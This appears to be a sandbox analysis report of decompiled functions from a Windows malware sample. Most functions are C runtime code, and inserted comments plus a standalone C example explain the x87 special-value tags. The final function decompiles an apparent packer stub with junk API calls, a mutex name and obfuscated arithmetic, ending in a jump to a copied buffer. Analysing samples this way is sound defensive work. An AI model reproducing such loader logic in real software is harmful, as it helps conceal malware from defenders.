                								__eflags =  *_t437 - 0x8000;
                								if( *_t437 >= 0x8000) {
                									asm("movsd");
                									asm("movsd");
                									_t437 =  &_v64;
                									asm("movsd");
                									_t54 =  &_v62;
                									 *_t54 = _v62 - 1;
                									__eflags =  *_t54;
                									_v72 = _t437;
                								}
                								_t600 =  *(_t437 + 0xa) & 0x0000ffff;
                								_v88 = 0;
                								_v20 = 0;
                								_v16 = 0;
                								_v12 = 0;
                								_t551 = _v26;
                								_v76 = (_t600 ^ _t551) & 0x00008000;
                								_t552 = _t551 & 0x00007fff;
                								_t601 = _t600 & 0x00007fff;
                								_t620 = _t601 + _t552 & 0x0000ffff;
                								__eflags = _t552 - 0x7fff;
                								if(_t552 >= 0x7fff) {
                									L94:
                									_t625 = 0;
                									__eflags = _v76;
                									_v28 = ((0 | _v76 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                									goto L41;
                								} else {
                									__eflags = _t601 - 0x7fff;
                									if(_t601 >= 0x7fff) {
                										goto L94;
                									}
                									__eflags = _t620 - 0xbffd;
                									if(_t620 > 0xbffd) {
                										goto L94;
                									}
                									__eflags = _t620 - 0x3fbf;
                									if(_t620 > 0x3fbf) {
                										_t625 = 0;
                										__eflags = _t552;
                										if(_t552 != 0) {
                											L47:
                											__eflags = _t601 - _t625;
                											if(_t601 != _t625) {
                												L51:
                												_t78 =  &_v92;
                												 *_t78 = _v92 & _t625;
                												__eflags =  *_t78;
                												_t647 =  &_v16;
                												_v68 = 5;
                												do {
                													_t602 = _v68;
                													_t554 = _v92 + _v92;
                													_v84 = _t602;
                													__eflags = _t602;
                													if(_t602 <= 0) {
                														goto L61;
                													}
                													_t443 = _t437 + 8;
                													__eflags = _t443;
                													_v112 = _t653 + _t554 - 0x20;
                													_v108 = _t443;
                													do {
                														_t607 =  *((intOrPtr*)(_t647 - 4));
                														_t573 = ( *_v112 & 0x0000ffff) * ( *_v108 & 0x0000ffff);
                														_v96 = _v96 & 0x00000000;
                														_t447 = _t607 + _t573;
                														__eflags = _t447 - _t607;
                														if(_t447 < _t607) {
                															L56:
                															_v96 = 1;
                															goto L57;
                														}
                														__eflags = _t447 - _t573;
                														if(_t447 >= _t573) {
                															goto L57;
                														}
                														goto L56;
                														L57:
                														__eflags = _v96;
                														 *((intOrPtr*)(_t647 - 4)) = _t447;
                														if(_v96 != 0) {
                															 *_t647 =  *_t647 + 1;
                															__eflags =  *_t647;
                														}
                														_v112 =  &(_v112[1]);
                														_v108 = _v108 - 2;
                														_v84 = _v84 - 1;
                														__eflags = _v84;
                													} while (_v84 > 0);
                													_t437 = _v72;
                													L61:
                													_t647 =  &(_t647[0]);
                													_v92 = _v92 + 1;
                													_v68 = _v68 - 1;
                													__eflags = _v68;
                												} while (_v68 > 0);
                												_t622 = _t620 + 0xc002;
                												__eflags = _t622;
                												if(_t622 <= 0) {
                													L66:
                													_t622 = _t622 + 0xffff;
                													__eflags = _t622;
                													if(_t622 >= 0) {
                														L73:
                														__eflags = _v20 - 0x8000;
                														if(_v20 > 0x8000) {
                															L75:
                															__eflags = _v18 - 0xffffffff;
                															if(_v18 != 0xffffffff) {
                																_t151 =  &_v18;
                																 *_t151 = _v18 + 1;
                																__eflags =  *_t151;
                															} else {
                																_v18 = _v18 & 0x00000000;
                																__eflags = _v14 - 0xffffffff;
                																if(_v14 != 0xffffffff) {
                																	_v14 = _v14 + 1;
                																} else {
                																	_v14 = _v14 & 0x00000000;
                																	__eflags = _v10 - 0xffff;
                																	if(_v10 != 0xffff) {
                																		_v10 = _v10 + 1;
                																	} else {
                																		_v10 = 0x8000;
                																		_t622 = _t622 + 1;
                																	}
                																}
                															}
                															L82:
                															__eflags = _t622 - 0x7fff;
                															if(_t622 < 0x7fff) {
                																_v36 = _v18;
                																_v34 = _v16;
                																_v30 = _v12;
                																_v26 = _t622 | _v76;
                															} else {
                																__eflags = _v76;
                																_v32 = 0;
                																_v36 = 0;
                																_t560 = ((0 | _v76 == 0x00000000) - 0x00000001 & 0x80000000) + 0x7fff8000;
                																__eflags = _t560;
                																_v28 = _t560;
                															}
                															goto L84;
                														}
                														__eflags = (_v20 & 0x0001ffff) - 0x18000;
                														if((_v20 & 0x0001ffff) != 0x18000) {
                															goto L82;
                														}
                														goto L75;
                													}
                													_t456 =  ~_t622 & 0x0000ffff;
                													_t622 = _t622 + _t456;
                													__eflags = _t622;
                													do {
                														__eflags = _v20 & 0x00000001;
                														if((_v20 & 0x00000001) != 0) {
                															_t124 =  &_v88;
                															 *_t124 = _v88 + 1;
                															__eflags =  *_t124;
                														}
                														_v12 = _v12 >> 1;
                														_t456 = _t456 - 1;
                														__eflags = _t456;
                														_v16 = _v16 >> 0x00000001 | _v12 << 0x0000001f;
                														_v20 = _v20 >> 0x00000001 | _v16 << 0x0000001f;
                													} while (_t456 != 0);
                													__eflags = _v88 - _t456;
                													if(_v88 != _t456) {
                														_t135 =  &_v20;
                														 *_t135 = _v20 | 0x00000001;
                														__eflags =  *_t135;
                													}
                													goto L73;
                												} else {
                													goto L63;
                												}
                												while(1) {
                													L63:
                													__eflags = _v12 & 0x80000000;
                													if((_v12 & 0x80000000) != 0) {
                														break;
                													}
                													_t457 = _v16;
                													_v20 = _v20 << 1;
                													_v16 = _t457 + _t457 | _v20 >> 0x0000001f;
                													_t622 = _t622 + 0xffff;
                													_v12 = _v12 + _v12 | _t457 >> 0x0000001f;
                													__eflags = _t622;
                													if(_t622 > 0) {
                														continue;
                													}
                													break;
                												}
                												__eflags = _t622;
                												if(_t622 > 0) {
                													goto L73;
                												}
                												goto L66;
                											}
                											_t620 = _t620 + 1;
                											__eflags =  *(_t437 + 8) & 0x7fffffff;
                											if(( *(_t437 + 8) & 0x7fffffff) != 0) {
                												goto L51;
                											}
                											__eflags =  *((intOrPtr*)(_t437 + 4)) - _t625;
                											if( *((intOrPtr*)(_t437 + 4)) != _t625) {
                												goto L51;
                											}
                											__eflags =  *_t437 - _t625;
                											if( *_t437 == _t625) {
                												L40:
                												_v28 = _t625;
                												L41:
                												_v32 = _t625;
                												_v36 = _t625;
                												goto L85;
                											}
                											goto L51;
                										}
                										_t620 = _t620 + 1;
                										__eflags = _v28 & 0x7fffffff;
                										if((_v28 & 0x7fffffff) != 0) {
                											goto L47;
                										}
                										__eflags = _v32;
                										if(_v32 != 0) {
                											goto L47;
                										}
                										__eflags = _v36;
                										if(_v36 != 0) {
                											goto L47;
                										}
                										_v26 = 0;
                										goto L85;
                									}
                									_t625 = 0;
                									__eflags = 0;
                									goto L40;
                								}
                								L85:
                								__eflags = _t483 - _t625;
                							} while (_t483 != _t625);
                							goto L86;
                						}
                					}
                					// Special-value path of the CRT long double formatter: the exponent is all ones,
                					// _t497 holds the sign word, _t625 / _t609 the high / low mantissa dwords.
                					 *_t479 = 1;
                					__eflags = _t625 - 0x80000000;
                					if(_t625 != 0x80000000) {
                						L11:
                						__eflags = _t625 & 0x40000000;
                						if((_t625 & 0x40000000) != 0) {
                							L13:
                							__eflags = _t497;
                							if(_t497 == 0) {
                								L17:
                								__eflags = _t625 - 0x80000000;
                								if(_t625 != 0x80000000) {
                									L23:
                									_push("1#QNAN");
                									goto L24;
                								}
                								__eflags = _t609;
                								if(_t609 != 0) {
                									goto L23;
                								} else {
                									_push("1#INF");
                									L20:
                									// E004068D0(record + 4, 0x16, tag) is strcpy_s per the API ID; a non-zero
                									// return (truncation) falls into E004063C4 = __invoke_watson(0, 0, 0, 0, 0).
                									_push(0x16);
                									_push(_t479 + 4);
                									_t473 = E004068D0(_t575);
                									_t625 = 0;
                									__eflags = _t473;
                									if(_t473 != 0) {
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										_push(0);
                										E004063C4(_t497, _t575, _t609, 0);
                									}
                									 *((char*)(_t479 + 3)) = 5;
                									goto L27;
                								}
                							}
                							__eflags = _t625 - 0xc0000000;
                							if(_t625 != 0xc0000000) {
                								goto L17;
                							}
                							__eflags = _t609;
                							if(_t609 != 0) {
                								goto L23;
                							} else {
                								_push("1#IND");
                								goto L20;
                							}
                						} else {
                							_push("1#SNAN");
                							L24:
                							_push(0x16);
                							_push(_t479 + 4);
                							_t470 = E004068D0(_t575);
                							_t625 = 0;
                							__eflags = _t470;
                							if(_t470 != 0) {
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								E004063C4(_t497, _t575, _t609, 0);
                							}
                							 *((char*)(_t479 + 3)) = 6;
                							L27:
                							_t389 = 0;
                							goto L170;
                						}
                					}
                					__eflags = _t609;
                					if(_t609 == 0) {
                						goto L13;
                					}
                					goto L11;
                				} else {
                					_t575 = 0;
                					 *_t479 = 0;
                					 *((char*)(_t479 + 2)) = ((0x8000 | _t497 != 0x00008000) - 0x00000001 & 0x0000000d) + 0x20;
                					 *((char*)(_t479 + 3)) = 1;
                					 *((char*)(_t479 + 4)) = 0x30;
                					 *((char*)(_t479 + 5)) = 0;
                					L7:
                					_t389 = 1;
                					L170:
                					_t359 =  &_v8; // 0x410d30
                					// Epilogue: the saved stack cookie (_v8, XORed with ebp in _t653) is handed to
                					// E0040533B, the CRT's __security_check_cookie.
                					return E0040533B(_t389, _t489,  *_t359 ^ _t653, _t575, _t609, _t625);
                				}
                			}
                Instruction address column for this function (0x00412522 to 0x00412e35; opcode text not extracted)

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: __invoke_watson_strcpy_s
                • String ID: 0A$1#IND$1#INF$1#QNAN$1#SNAN$?$T
                • API String ID: 3990783250-4223663711
                • Opcode ID: 79a6f41ba8228fef75e1be480c02d21ddbb6ffad5278a54dee1caee9ab74faab
                • Instruction ID: 1c8359ebcc323d5997ae362db3a09dfdd5e4ba76c3a6d7451d9804dcfa0fd4e9
                • Opcode Fuzzy Hash: 79a6f41ba8228fef75e1be480c02d21ddbb6ffad5278a54dee1caee9ab74faab
                • Instruction Fuzzy Hash: 8C629F71E0065A8BDF24CFA8C6502EEB7B1FF54310F14816BD855EB381D7B85A92CB98
                Uniqueness

                Uniqueness Score: -1.00%
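The branch ladder at the end of the routine above is the special-value path of the CRT's long double formatter: the tags 1#INF, 1#IND, 1#QNAN and 1#SNAN are what the C runtime writes for infinity, the x87 real indefinite, a quiet NaN and a signalling NaN, with _t497 as the sign word and _t625 / _t609 as the high and low mantissa dwords. Recognising the ladder lets an analyst mark the routine as library code rather than sample logic. The following is an added example, not code from the sample or from the report, that writes the same classification out in plain C and drives it with constructed bit patterns, one per branch; the type and function names (x87_value, x87_special_tag, fmt_record) are mine.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* An x87 80-bit value split the way the FPU stores it and the way the
 * decompiled routine reads it: _t497 is the sign word, _t625 and _t609
 * are the high and low mantissa dwords. */
typedef struct {
    uint16_t sign_exp;   /* bit 15 = sign, bits 0..14 = biased exponent */
    uint64_t mantissa;   /* bit 63 = explicit integer bit, bit 62 = quiet bit */
} x87_value;

/* Field size used by the listing: strcpy_s(record + 4, 0x16, tag). */
#define TAG_FIELD_SIZE 0x16

/* Classify a value whose exponent is all ones. Returns NULL for finite
 * values (exponent not 0x7fff), which take the ordinary digit path. */
static const char *x87_special_tag(x87_value v) {
    if ((v.sign_exp & 0x7fff) != 0x7fff)
        return NULL;
    bool negative = (v.sign_exp & 0x8000) != 0;
    uint32_t hi = (uint32_t)(v.mantissa >> 32);  /* _t625 in the listing */
    uint32_t lo = (uint32_t)v.mantissa;           /* _t609 in the listing */

    if (hi == 0x80000000u && lo == 0)             /* integer bit only: infinity */
        return "1#INF";
    if ((hi & 0x40000000u) == 0)                  /* quiet bit clear: signalling NaN */
        return "1#SNAN";
    if (negative && hi == 0xc0000000u && lo == 0) /* real indefinite, the x87's own NaN */
        return "1#IND";
    return "1#QNAN";
}

/* Kind byte the listing stores at offset 3: 5 for INF and IND, 6 for
 * either NaN; 0 here when the value is finite. */
static int x87_special_kind(x87_value v) {
    const char *tag = x87_special_tag(v);
    if (tag == NULL)
        return 0;
    return (strcmp(tag, "1#INF") == 0 || strcmp(tag, "1#IND") == 0) ? 5 : 6;
}

/* Sign character the listing derives from the sign word: '-' or ' '. */
static char x87_sign_char(x87_value v) {
    return (v.sign_exp & 0x8000) ? '-' : ' ';
}

/* The part of the output record the routine writes: sign at +2, kind at +3,
 * text at +4 in a 0x16-byte field. */
typedef struct {
    char sign;
    int kind;
    char text[TAG_FIELD_SIZE];
} fmt_record;

/* Fill the record for a special value; returns false for finite input. */
static bool format_special(x87_value v, fmt_record *out) {
    const char *tag = x87_special_tag(v);
    if (tag == NULL)
        return false;
    memset(out, 0, sizeof *out);
    out->sign = x87_sign_char(v);
    out->kind = x87_special_kind(v);
    snprintf(out->text, sizeof out->text, "%s", tag);  /* bounded like strcpy_s */
    return true;
}

#if defined(__x86_64__) || defined(__i386__)
/* On x86 targets a C long double is this 80-bit format; pull the fields out
 * of its object representation (little-endian: mantissa first, then sign/exp). */
static x87_value x87_from_long_double(long double d) {
    x87_value v;
    memcpy(&v.mantissa, &d, sizeof v.mantissa);
    memcpy(&v.sign_exp, (const unsigned char *)&d + 8, sizeof v.sign_exp);
    return v;
}
#endif

int main(void) {
    /* Constructed bit patterns, one per branch of the decompiled routine. */
    const x87_value samples[] = {
        { 0x7fff, 0x8000000000000000ull },   /* +INF */
        { 0xffff, 0xc000000000000000ull },   /* real indefinite */
        { 0x7fff, 0xc000000000000000ull },   /* quiet NaN */
        { 0x7fff, 0x8000000000000001ull },   /* signalling NaN */
        { 0x3fff, 0x8000000000000000ull },   /* 1.0, finite */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        fmt_record r;
        if (format_special(samples[i], &r))
            printf("%c%s (kind %d)\n", r.sign, r.text, r.kind);
        else
            printf("finite value, ordinary digit path\n");
    }
    return 0;
}
```

The order of the tests matters and follows the listing: infinity is recognised before the quiet bit is examined, because the integer-bit-only mantissa would otherwise look like a signalling NaN, and IND is only reported for the negative sign, which is how the x87 produces it.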

                C-Code - Quality: 85%
                			E0040533B(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                				intOrPtr _v0;
                				void* _v804;
                				intOrPtr _v808;
                				intOrPtr _v812;
                				intOrPtr _t6;
                				intOrPtr _t11;
                				intOrPtr _t12;
                				intOrPtr _t13;
                				long _t17;
                				intOrPtr _t21;
                				intOrPtr _t22;
                				intOrPtr _t25;
                				intOrPtr _t26;
                				intOrPtr _t27;
                				intOrPtr* _t31;
                				void* _t34;
                
                				_t27 = __esi;
                				_t26 = __edi;
                				_t25 = __edx;
                				_t22 = __ecx;
                				_t21 = __ebx;
                				_t6 = __eax;
                				// __security_check_cookie: ecx is compared with the process /GS cookie at
                				// 0x42a280; on a match "repe ret" returns to the caller, otherwise execution
                				// falls through into __report_gsfailure below.
                				_t34 = _t22 -  *0x42a280; // 0x394af7
                				if(_t34 == 0) {
                					asm("repe ret");
                				}
                				// __report_gsfailure: snapshot the general, segment and flag registers into a
                				// global CONTEXT (ContextFlags = 0x10001 = CONTEXT_i386 | CONTEXT_CONTROL).
                				 *0x42c210 = _t6;
                				 *0x42c20c = _t22;
                				 *0x42c208 = _t25;
                				 *0x42c204 = _t21;
                				 *0x42c200 = _t27;
                				 *0x42c1fc = _t26;
                				 *0x42c228 = ss;
                				 *0x42c21c = cs;
                				 *0x42c1f8 = ds;
                				 *0x42c1f4 = es;
                				 *0x42c1f0 = fs;
                				 *0x42c1ec = gs;
                				asm("pushfd");
                				_pop( *0x42c220);
                				 *0x42c214 =  *_t31;
                				 *0x42c218 = _v0;
                				 *0x42c224 =  &_a4;
                				 *0x42c160 = 0x10001;
                				_t11 =  *0x42c218; // 0x0
                				 *0x42c114 = _t11;
                				// EXCEPTION_RECORD: ExceptionCode = 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN),
                				// ExceptionFlags = 1 (EXCEPTION_NONCONTINUABLE).
                				 *0x42c108 = 0xc0000409;
                				 *0x42c10c = 1;
                				// The cookie and its complement (0xffc6b508 = ~0x394af7) are saved as the
                				// record's ExceptionInformation.
                				_t12 =  *0x42a280; // 0x394af7
                				_v812 = _t12;
                				_t13 =  *0x42a284; // 0xffc6b508
                				_v808 = _t13;
                				// This IsDebuggerPresent belongs to the CRT routine: it only decides whether the
                				// second debugger hook below runs, so this reference is not sample-specific
                				// anti-debugging.
                				 *0x42c158 = IsDebuggerPresent();
                				_push(1);
                				E00409A62(_t14); // __crt_debugger_hook(1 = _CRT_DEBUGGER_GSFAILURE)
                				SetUnhandledExceptionFilter(0); // drop any user filter so the default handler runs
                				_t17 = UnhandledExceptionFilter(0x401aec);
                				if( *0x42c158 == 0) {
                					_push(1);
                					E00409A62(_t17);
                				}
                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                			}

                Instruction address column for this function (0x0040533b to 0x00405343 and 0x004097c7 to 0x004098c1; opcode text not extracted)

                APIs
                • IsDebuggerPresent.KERNEL32 ref: 00409877
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040988C
                • UnhandledExceptionFilter.KERNEL32(00401AEC), ref: 00409897
                • GetCurrentProcess.KERNEL32(C0000409), ref: 004098B3
                • TerminateProcess.KERNEL32(00000000), ref: 004098BA
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                • String ID:
                • API String ID: 2579439406-0
                • Opcode ID: d837466445b4170ea709e65bdf9e48976520db9c1200a4fe055c2eeb5f5800fc
                • Instruction ID: 21d8e7ad53a1dc08df6e4edab417607fa4795ce5001b9851a04fb97e5a439dbe
                • Opcode Fuzzy Hash: d837466445b4170ea709e65bdf9e48976520db9c1200a4fe055c2eeb5f5800fc
                • Instruction Fuzzy Hash: 9221EA74A00305DFD720DF95F9C66583BA4BB18344F90807AE81893772EBB459928FAE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004084CF() {
                
                				SetUnhandledExceptionFilter(E0040848D);
                				return 0;
                			}

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0000848D), ref: 004084D4
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 6f04be37edccb9c73464df98e5f1b3db6cbafd6d01814fe41fcf8fdf35cffb6f
                • Instruction ID: d0b837e2db365d5c5ce4375092b20700385d67de4693b74d46e8cf132d3f005c
                • Opcode Fuzzy Hash: 6f04be37edccb9c73464df98e5f1b3db6cbafd6d01814fe41fcf8fdf35cffb6f
                • Instruction Fuzzy Hash: 619002A065214686C7001BB06E0A64925A05A48712B56847A6495E5CE4FE7440846529
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: 6150048bdd162ab019e7f292e2be4eb24d30230505b004e1a0f91914bde488e1
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 4C117072340104AFD754DE65DC95FB673EAEB88320B298155EA08CB312DA79EC01C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00403957(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a124, intOrPtr _a128, intOrPtr _a132, intOrPtr _a136, long _a140, struct _CONSOLE_CURSOR_INFO _a144, struct _DCB _a156, struct _OSVERSIONINFOW _a192, char _a448, short _a488, void _a2500, char _a3520) {
                				char _v0;
                				intOrPtr _v4;
                				intOrPtr _v8;
                				intOrPtr _v12;
                				char _v16;
                				intOrPtr _t296;
                				intOrPtr _t297;
                				intOrPtr _t298;
                				intOrPtr* _t444;
                				void* _t446;
                				intOrPtr* _t447;
                
                				do {
                					 *((char*)( *0x667ed4 + _t296)) =  *((intOrPtr*)( *0x66e6c0 + _t296 + 0x11b1b));
                					if( *0x667f64 == 0xa8) {
                						GetConsoleCursorInfo(0,  &_a144);
                						GetModuleFileNameW(0,  &_a488, 0);
                						EnumFontsW(0, L"hagayaxewewagucizinahegej", 0, 0);
                						GetVersionExW( &_a192);
                						__imp__GetConsoleAliasesLengthA(0);
                						SleepEx(0, 0);
                						CreateFileMappingW(0, 0, 0, 0, 0, 0);
                						CreateMutexA(0, 0, "wilofusasonamapofedahu");
                						GetCommState(0,  &_a156);
                						FreeConsole();
                						_t296 = _v4;
                					}
                					_t297 = _t296 + 1;
                					_a16 = _t297;
                				} while (_t297 <  *0x667f64);
                				_t298 = 0;
                				_a16 = 0;
                				do {
                					if( *0x667f64 + _t298 == 0xe) {
                						MapGenericMask(0, 0);
                						DebugBreak();
                						FreeConsole();
                						_v0(0);
                						FreeConsole();
                						InterlockedExchangeAdd( &_a140, 0);
                						WaitForMultipleObjectsEx(0, 0, 0, 0, 0);
                						_t298 = _a12;
                					}
                					_t298 = _t298 + 1;
                					_a16 = _t298;
                				} while (_t298 < 0x4fe229);
                				_t446 = 0x4cc;
                				do {
                					GetCharWidthW(0, 0, 0, 0);
                					GetCharABCWidthsFloatW(0, 0, 0, 0);
                					_t446 = _t446 - 1;
                				} while (_t446 != 0);
                				while(1) {
                					GetLastError();
                					if(_t446 < 0x3b9f945) {
                						_a36 = 0x3ae40fea;
                						_a88 = 0x4da9f927;
                						_a16 = 0x76dbcd96;
                						_a80 = 0x5c01b59;
                						_a68 = 0x69b972f0;
                						_a24 = 0x6315b1bc;
                						_a32 = 0x268efdf3;
                						_a92 = 0x758aab55;
                						_a72 = 0x293c9e6e;
                						_a64 = 0x7d25b6d7;
                						_a56 = 0x49f78072;
                						_a20 = 0x411e99f8;
                						_a12 = 0x58c56864;
                						_a124 = 0x3a5c90d5;
                						_a28 = 0x55787069;
                						_a132 = 0x61b5b59f;
                						_a112 = 0x739d0620;
                						_a52 = 0x3eef0288;
                						_a108 = 0x49cdaba2;
                						_a104 = 0x1f200a15;
                						_a4 = 0x6ab47c1e;
                						_a76 = 0x60bcbe35;
                						_v4 = 0x2247b61f;
                						_a84 = 0xb7d6359;
                						_a128 = 0xa8bb680;
                						_a44 = 0x5f860f6d;
                						_a60 = 0x1f006e87;
                						_a96 = 0x344135c6;
                						_v0 = 0x6da7e3e1;
                						_v16 = 0x479039f5;
                						_a100 = 0x9fa3415;
                						_a8 = 0x7c643086;
                						_v8 = 0x2694f336;
                						_v12 = 0x6cb4a5e8;
                						_a48 = 0x2d3a3b6a;
                						_a136 = 0x4b4207e4;
                						_a40 = 0x6a30f715;
                						_a140 = 0x40a7a320;
                						_a36 = _a36 - 0x3d2cd01f;
                						_a36 = _a36 - 0x1a8468ec;
                						_a88 = _a88 - 0x35b81e1b;
                						_a16 = _a16 - 0x1f2956f1;
                						_a88 = _a88 + 0x10bd938a;
                						_a88 = _a88 + 0x387b6b7d;
                						_a80 = _a80 + 0x55e9422f;
                						_a36 = _a36 + 0x2f9fc9;
                						_a80 = _a80 + 0x685f757d;
                						_a16 = _a16 + 0x18684b6a;
                						_a12 = _a12 + 0xc792e25;
                						_a28 = _a28 - 0x71c2a565;
                						_a56 = _a56 + 0x41d3e078;
                						_a16 = _a16 + 0x6066dbc4;
                						_a28 = _a28 - 0x1195370a;
                						_a56 = _a56 + 0x50570176;
                						_a16 = _a16 - 0x2bd3ed46;
                						_a108 = _a108 + 0x392008dc;
                						_a132 = _a132 - 0x5754d300;
                						_a76 = _a76 - 0x2ce43c9b;
                						_a12 = _a12 - 0x30721d20;
                						_a52 = _a52 - 0x2ccd0822;
                						_v4 = _v4 + 0x41048ed8;
                						_a112 = _a112 - 0xc569312;
                						_a76 = _a76 + 0x47dd74a5;
                						_a24 = _a24 - 0x28076cb2;
                						_a92 = _a92 - 0x436d683b;
                						_a112 = _a112 + 0x6106b7c4;
                						_a16 = _a16 - 0x41aae26e;
                						_a28 = _a28 - 0x5ce84155;
                						_a52 = _a52 + 0x2234c681;
                						_a80 = _a80 - 0x290d37f4;
                						_v0 = _v0 - 0x2476c0e6;
                						_a28 = _a28 - 0xfb5be67;
                						_v0 = _v0 + 0x69bdf9d;
                						_v12 = _v12 - 0x1cf7abbe;
                						_a20 = _a20 + 0xbea7d89;
                						_a76 = _a76 + 0x7a5b1c5b;
                						_a104 = _a104 - 0x18c76000;
                						_a92 = _a92 + 0x46a1d242;
                					}
                					if(_t446 > 0xbeedf1) {
                						break;
                					}
                					_t446 = _t446 + 1;
                					if(_t446 < 0x81043) {
                						continue;
                					}
                					break;
                				}
                				E00403660();
                				E00403770();
                				_t447 = __imp__ReplaceFileA;
                				_v16 = 0x7b;
                				do {
                					if( *0x667f64 == 0x86) {
                						 *_t447(0, 0, 0, 0, 0, 0);
                						WritePrivateProfileStringW(0, 0, 0, 0);
                					}
                					if( *0x667f64 == 0xf) {
                						lstrcmpiW(0, 0);
                						CreateEventW(0, 0, 0, 0);
                					}
                					_t287 =  &_v16;
                					 *_t287 = _v16 - 1;
                				} while ( *_t287 != 0);
                				_t444 = __imp__CreateActCtxA;
                				_v16 = 0x3078f;
                				do {
                					if( *0x667f64 == 0x83) {
                						MulDiv(0, 0, 0);
                						 *_t444( &_a144);
                						GetFileAttributesExW(0, 0,  &_a2500);
                						GetLogicalDriveStringsA(0,  &_a3520);
                						__imp__GetLongPathNameA(0,  &_a448, 0);
                						WritePrivateProfileStructW(0, 0, 0, 0, 0);
                						IsBadReadPtr(0, 0);
                						CancelWaitableTimer(0);
                						GetFileType(0);
                						GetModuleHandleA(0);
                					}
                					_t294 =  &_v16;
                					 *_t294 = _v16 - 1;
                				} while ( *_t294 != 0);
                				E004033B0();
                				 *0x667f58 =  *0x667ed4;
                				goto __eax;
                			}

                APIs
                • GetConsoleCursorInfo.KERNEL32(00000000,?), ref: 0040398C
                • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040399A
                • EnumFontsW.GDI32(00000000,hagayaxewewagucizinahegej,00000000,00000000), ref: 004039A7
                • GetVersionExW.KERNEL32(?), ref: 004039B1
                • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 004039B9
                • SleepEx.KERNEL32(00000000,00000000), ref: 004039C3
                • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004039D5
                • CreateMutexA.KERNEL32(00000000,00000000,wilofusasonamapofedahu), ref: 004039E4
                • GetCommState.KERNEL32(00000000,?), ref: 004039F4
                • FreeConsole.KERNEL32 ref: 004039FA
                • MapGenericMask.ADVAPI32(00000000,00000000), ref: 00403A3A
                • DebugBreak.KERNEL32 ref: 00403A3C
                • FreeConsole.KERNEL32 ref: 00403A3E
                • AttachConsole.KERNEL32(00000000), ref: 00403A42
                • FreeConsole.KERNEL32 ref: 00403A44
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00403A50
                • WaitForMultipleObjectsEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00403A60
                • GetCharWidthW.GDI32(00000000,00000000,00000000,00000000), ref: 00403A8F
                • GetCharABCWidthsFloatW.GDI32(00000000,00000000,00000000,00000000), ref: 00403A99
                • GetLastError.KERNEL32 ref: 00403AA6
                • ReplaceFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403EE8
                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403EF2
                • lstrcmpiW.KERNEL32(00000000,00000000), ref: 00403F01
                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F0B
                • MulDiv.KERNEL32(00000000,00000000,00000000), ref: 00403F46
                • CreateActCtxA.KERNEL32(?), ref: 00403F50
                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00403F5E
                • GetLogicalDriveStringsA.KERNEL32 ref: 00403F6A
